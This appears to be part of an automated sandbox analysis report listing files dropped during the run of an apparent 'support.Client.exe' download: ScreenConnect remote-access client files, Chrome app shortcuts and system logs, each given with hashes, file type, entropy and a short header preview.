                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe:Zone.Identifier

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.850192336318162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:GxIh+Sflv4V/bBI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7xk7NxGC:Em9CukLdtkL
                                                                                                                                                                              MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
                                                                                                                                                                              SHA1:A39E2643E8DBD2097829E0B08938726557CB8E36
                                                                                                                                                                              SHA-256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
                                                                                                                                                                              SHA-512:58CC7741EBE1AADA93FD82A3E0A571A9A1AA3E400C46E7CDDDEF876D74F4FBBCBAE4293AC556B3823E8DC977E7CE72337A16C2D48EAB0AA52B736412AE43C634
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..@..........B^... ...`....@.. .......................`.......<....@..................................]..O....`.. ............... )...@......<]..8............................................ ............... ..H............text...H>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B................#^......H........*...1...................\........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}C....s....}B...~@...%-.&~?.....<...s ...%.@.......?...s ........@...s!...}D......A...s"..........(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t..........o$.......o%.......

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                              Entropy (8bit):3.463057265798253
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                              MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                              SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                              SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                              SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2673
                                                                                                                                                                              Entropy (8bit):3.9897965635590027
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8GdbTDnCHRidAKZdA1FehwiZUklqehwy+3:8uHETy
                                                                                                                                                                              MD5:2409E7A99E2BAE3287C0C318BDE3DF18
                                                                                                                                                                              SHA1:92091F74215BDFDD14BC3169AC70D0D85EAC469A
                                                                                                                                                                              SHA-256:9A764EAAC3ADBAC5E8F23549E1E5A7E24D8EB1E26E9762A8278D13999D6FDE22
                                                                                                                                                                              SHA-512:E6E3FE9D8FFA100A0E84BF583AFC0E4057A97EEEB3D3921EAB1A580E93D4B77AF3C8459FDD8CAA58860568701912C678A7897BC83220DDA7235B32F4964A55FF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....u.;"1*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2675
                                                                                                                                                                              Entropy (8bit):4.0041280069380845
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8HadbTDnCHRidAKZdA1seh/iZUkAQkqehDy+2:8HCH69QSy
                                                                                                                                                                              MD5:FB6BF3792F3CE635FAF851F71EADB75F
                                                                                                                                                                              SHA1:A0A6FAC574B6B7B5686613E872E29C9C43EB2AED
                                                                                                                                                                              SHA-256:39DC39DC90239DC1742AC936C40F3BC9281D29DD01E0FA88BC4195297367270C
                                                                                                                                                                              SHA-512:74EB764E78A41728D3D1DD9FC709FB66353A4F24DA2E4483D0AF8D29084A3B8A4E2C3E2DE45BDD6776B220E58EDB35467E054A7C75D93B6480BD8398C500CE6A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....0"1*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2689
                                                                                                                                                                              Entropy (8bit):4.0148359126549265
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:80dbTDnAHRidAKZdA14meh7sFiZUkmgqeh7sdy+BX:8oHYnXy
                                                                                                                                                                              MD5:5F920FB136C56B426B6BA0FDF8A40BF6
                                                                                                                                                                              SHA1:564F47DFE10BC65500AF1C38FED0E9F73FBF24D6
                                                                                                                                                                              SHA-256:D13797781FC00CD30C27ADAB52AF4749F3F7F41FD196F4572DF2158C153B60A4
                                                                                                                                                                              SHA-512:4CCC0433E3E8A96E0B0C2A6AC9FB70207AF3648F523E02551096C953E40933DDB86A7880BA38C7AFB24773DD4328C79E810D6C196AFA857116C7B3921CE973C4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):4.0037178094955355
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:89dbTDnCHRidAKZdA1TehDiZUkwqehfy+R:8rHxFy
                                                                                                                                                                              MD5:829DADD0DB71EB46D498F4504AFEDFA8
                                                                                                                                                                              SHA1:A637A0285853F9C578DFAD3D464C9602DD66075A
                                                                                                                                                                              SHA-256:8F8835F6618CF98B481911B39E43F22640BF9E224248DE5D81F90ECD60A155FF
                                                                                                                                                                              SHA-512:F8C85CD3021BF5B73E38568863168B6158E1FBC4F1DEBF5E079CD2863DE3A98795C88AC34AEDE7984CA86107917DA982694383254936FF3D576493048680FD18
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,......+"1*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):3.9912352848849784
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8vdbTDnCHRidAKZdA1dehBiZUk1W1qehhy+C:8BHx9By
                                                                                                                                                                              MD5:BDFE77A925ED0708F9AB46E7658800F5
                                                                                                                                                                              SHA1:7084A89E3124CEBE526F51E0D9AD09C646B0A36F
                                                                                                                                                                              SHA-256:52DEA6A86CC9037714915DD44D8030731F9FF4B13D28C1FAFD98B8359DC9A5BE
                                                                                                                                                                              SHA-512:F71F85B825FC060DEB15C02FAC36E91A24B94D11ED092D06F7D5CB070596F9FCA758161EA2F13F013BFB0F76BD30D2DCD4188F3CDA023EC9529B5CD1BE8899E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....5.5"1*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                              Entropy (8bit):4.002420467200904
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8qdbTDnCHRidAKZdA1duTeehOuTbbiZUk5OjqehOuTbXy+yT+:8yHZTfTbxWOvTbXy7T
                                                                                                                                                                              MD5:A149394FBD71F5AA7BD4FA56FCC00592
                                                                                                                                                                              SHA1:AAAF3C25614E78E5BD5EDEE8D16B63D871C0D2BF
                                                                                                                                                                              SHA-256:E6152F8527FF2BC2B1FAAE0F7A9873336A3F11313889856B39BEB30ED30A97C6
                                                                                                                                                                              SHA-512:73CF9317F808896386A8ED236144899711DC1952C8FABDB8AC969385B7C510379E15B3571CD8417116F569BC1EB49E23B67EE8D2DD9F9E20FB1F609F6F3E9668
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....!"1*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y6.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|.. .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                              C:\Users\user\Downloads\Unconfirmed 974768.crdownload

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):86304
                                                                                                                                                                              Entropy (8bit):6.366539484726693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xe:yFNpo6rIKlUE8fbkqRfbaQlaYYSe
                                                                                                                                                                              MD5:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              SHA1:96416735AE481583D2384E1C1D94F11AF6001384
                                                                                                                                                                              SHA-256:49E15A04657508140FF3409AE29947EA30BF19D98D1288CA62821F6851D278BD
                                                                                                                                                                              SHA-512:FD1EC47A24F11838258A4C0C51B5AB68BA64AB10052A5802E0B06BDF027258CEFA3173F74DFE89EED57F3C570284738A77AB5F1F45ACF552EF100F85C2DED1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16056
                                                                                                                                                                              Entropy (8bit):6.421442638813114
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:+aWEWfbTJ+mj14zJc/8TUy6tQcyRY9IN02Hc+ZFv:+azWfvFZ4zJs0t8eY9uHc+ZV
                                                                                                                                                                              MD5:BF415D5D64E087797AA53817FA182680
                                                                                                                                                                              SHA1:BEDC87500001086F135F2D6F0F245039EEE757E2
                                                                                                                                                                              SHA-256:6CEFDE732BD60FD3568CDEF8C6272F5D7374EC095CE14A216906EEED873C9A38
                                                                                                                                                                              SHA-512:56F75596A87BC1AAEE6A8B59345DA82657B850A9D0E2C1E46F40838C4AC10D88F3D8864A788B0F404E406A2795F089A030683C04787E9FAFB7D486BDA4BF447C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\Downloads\support.Client.exe (copy)

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):86304
                                                                                                                                                                              Entropy (8bit):6.366539484726693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xe:yFNpo6rIKlUE8fbkqRfbaQlaYYSe
                                                                                                                                                                              MD5:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              SHA1:96416735AE481583D2384E1C1D94F11AF6001384
                                                                                                                                                                              SHA-256:49E15A04657508140FF3409AE29947EA30BF19D98D1288CA62821F6851D278BD
                                                                                                                                                                              SHA-512:FD1EC47A24F11838258A4C0C51B5AB68BA64AB10052A5802E0B06BDF027258CEFA3173F74DFE89EED57F3C570284738A77AB5F1F45ACF552EF100F85C2DED1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):4926
                                                                                                                                                                              Entropy (8bit):3.2464745947829505
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:FaqdF78F7B+AAHdKoqKFxcxkFiF7KaqdF73n8+AAHdKoqKFxcxkFdni:cEOB+AAsoJjykePEM+AAsoJjyki
                                                                                                                                                                              MD5:E395208173C239000FDD983148478397
                                                                                                                                                                              SHA1:112D4031B459AA222D59A93A20ACA352F6555750
                                                                                                                                                                              SHA-256:5FC9B394029F14F171F9A445C3AEF08C15850CE118DFC4722C739E7395DC5DD3
                                                                                                                                                                              SHA-512:7118BEC945CEF9A394C99ABE833B3DE6E9D778AFEC83218AE93C60AC346A5389A2A46AAEA51C589257576995E8190C048382F86E2DCE9A33058E51EB9FE6222E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
